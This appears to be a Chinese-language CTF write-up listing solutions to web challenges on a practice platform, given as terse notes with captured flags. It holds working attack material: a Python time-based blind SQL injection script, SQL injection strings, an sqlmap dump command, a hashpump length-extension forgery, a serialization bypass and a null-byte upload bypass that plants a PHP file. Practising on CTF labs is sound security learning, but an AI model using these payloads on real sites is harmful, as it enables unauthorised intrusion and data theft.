實驗吧ctf
阿新 • • 發佈:2019-01-07
1/登陸一下好嗎??
http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
='
='
ctf{51d1bf8fb65a8c2406513ee8f52283e7}
import requests
import time
payloads='[email protected]_.{}-'
flag = ''
def exp(x,i):
starttime=time.time()
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
xxx = "' or sleep(ascii(mid((select(flag)from(flag))from(" +str(x)+")for(1)))=ascii('"+i+"')) and '1'='1"
headers = {
"Host": "ctf5.shiyanbar.com",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3" ,"Accept-Encoding": "gzip, deflate",
"Connection": "keep-alive",
"X-FORWARDED-FOR": xxx
}
res = requests.get(url, headers=headers)
s = time.time() - starttime;
if s > 1:
return 1
else:
return 0
for x in range(1,33):
for i in payloads:
if (exp(x,i)):
flag+=i
print flag
break
else:
pass
print 'flag:'+flag
ctf{cdbf14c9551d5be5612f7bb5d2867853}
3/因缺思汀的繞過
http://ctf5.shiyanbar.com/web/pcat/index.php
uname=d%27or 1=1 group by pwd with rollup limit 1 offset 2%23&pwd=
CTF{with_rollup_interesting}
4/簡單的sql注入之3
http://ctf5.shiyanbar.com/web/index_3.php
sqlmap -u 'http://ctf5.shiyanbar.com/web/index_3.php?id=0' -D web1 --tables -T flag --columns --dump
5/簡單的sql注入之2
import requests
import base64
url = 'http://ctf5.shiyanbar.com/web/10/10.php'
s = requests.session()
response = s.get(url)
head = response.headers
flag = base64.b64decode(head['FLAG']).split(':')[1]
data = {'key': flag}
result = s.post(url=url, data=data)
print result.text
root@ubuntu:~/HashPump# hashpump
Input Signature: 571580b26c65f306376d4f64e53cb5c7
Input Data: admin
Input Key Length: 20
Input Data to Add: 123
961a38ded0b8553041ca20dd34e8e189
admin\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\x00\x00\x00\x00\x00\x00\x00123
提交內容:
getmein=961a38ded0b8553041ca20dd34e8e189
username=admin&password=admin%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c8%00%00%00%00%00%00%00123
CTF{cOOkieS_4nd_hAshIng_G0_w3LL_t0g3ther}
8/拐彎抹角
http://ctf5.shiyanbar.com/10/indirection/
CTF{PSEDUO_STATIC_DO_YOU_KNOW}
直接訪問得到flag,沒意思。
$a = $_POST["PIN"];
if ($a == -19827747736161128312837161661727773716166727272616149001823847) {
echo "Congratulations! The flag is $flag";
} else {
echo "User with provided PIN not found.";
}
</pre>Congratulations! The flag is ctf{forms_are_easy}
------WebKitFormBoundaryTx0av8Bu4ovD7Yas
Content-Disposition: form-data; name="username"
admin
------WebKitFormBoundaryTx0av8Bu4ovD7Yas
Content-Disposition: form-data; name="password"
a:2:{s:4:"user";b:1;s:4:"pass";b:1;}
------WebKitFormBoundaryTx0av8Bu4ovD7Yas--
ctf{dwduwkhduw5465}
11/忘記密碼了
http://ctf5.shiyanbar.com/10/upload/
.submit.php.swp
GET /10/upload/submit.php[email protected].com&token=0000000000
flag is SimCTF{huachuan_TdsWX}
/web/more.php?password=1e8%00*-*
Flag: CTF{Ch3ck_anD_Ch3ck}
/web/Session.php?password=
Flag: CTF{Cl3ar_th3_S3ss1on}
/web/false.php?name[]=1&password[]=2
Flag: CTF{t3st_th3_Sha1}
------WebKitFormBoundaryZwg3dXMwcw0wGJHb
Content-Disposition: form-data; name="dir"
/uploads/2.php(注意這裡是16進位制的00) jpg
------WebKitFormBoundaryZwg3dXMwcw0wGJHb
Content-Disposition: form-data; name="file"; filename="2.jpg"
Content-Type: applications/octet-stream
/uploads/8a9e5f6a7a789acb.php<br>æå–œä½ èŽ·å¾—flag一枚:<br>flag{SimCTF_huachuan}</body>
</html>
<?php
$_ = "a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$_ = str_rot13($_);
$_ = strrev($_);
$_ = base64_decode($_);
$_o = "";
for($_0 = strlen($_) - 1;$_0 >= 0; $_0 --){
$tmp = $_[$_0];
$tmp = ord($tmp);
$tmp --;
$tmp = chr($tmp);
$_o.=$tmp;
}
echo $_o;
?>
flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}
17/程式邏輯問題
user=' union /*!Select*/ 'c4ca4238a0b923820dcc509a6f75849b'-- - &pass=1
Logged in! Key: SimCTF{youhaocongming}
<script>**</script>
密碼是:Ihatejs
/DUTCTF/index.php?id=%2568%2561%2563%256b%2565%2572%2544%254a
flag: DUTCTF{PHP_is_the_best_program_language}
21/貌似有點難
http://ctf5.shiyanbar.com/phpaudit/
Modify Header 新增X-Forwarded-For:1.1.1.1 ;bp新增不好使。
SimCTF{daima_shengji}
21/頭有點大
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0 .NET CLR 9.9)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-gb,en;q=0.5
The key is:HTTpH34der</p>
22/Forbidden
Accept-Language: zh-hk,zh;q=0.8
KEY:123JustUserAGent
23/貓抓老鼠
Content-Row: MTUwMTE1NjUzNA==
Content-Length: 21
Content-Type: text/html
KEY: #WWWnsf0cus_NET#
24/看起來有點難